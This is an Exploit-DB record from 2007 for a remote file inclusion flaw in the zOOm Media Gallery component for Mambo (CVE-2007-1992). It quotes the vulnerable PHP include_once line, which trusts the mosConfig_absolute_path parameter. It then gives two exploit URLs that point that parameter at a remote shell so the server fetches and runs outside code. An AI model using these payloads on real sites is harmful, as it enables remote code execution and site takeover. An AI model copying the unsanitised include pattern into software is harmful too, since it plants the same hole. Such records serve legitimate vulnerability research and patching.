Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities

2007-04-11T00:00:00
ID EDB-ID:3706
Type exploitdb
Reporter iskorpitx
Modified 2007-04-11T00:00:00

Description

Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities. CVE-2007-1992. Webapps exploit for php platform

                                        
                                            iskorpitx@metlak
from TURKEY
com_zoom file include



******************************************************************************/

// Create the Makernote Parser and Interpreter Function Array

$GLOBALS['Makernote_Function_Array'] = array(   "Read_Makernote_Tag" =&gt; array( ),
                                                "get_Makernote_Text_Value" =&gt; array( ),
                                                "Interpret_Makernote_to_HTML" =&gt; array( ) );


// Include the Main TIFF and EXIF Tags array

include_once("$mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php");

/******************************************************************************

http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://shell*
http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://shell*

iskorpitx

admin@siyamiozkan-mavideniz.org

# milw0rm.com [2007-04-11]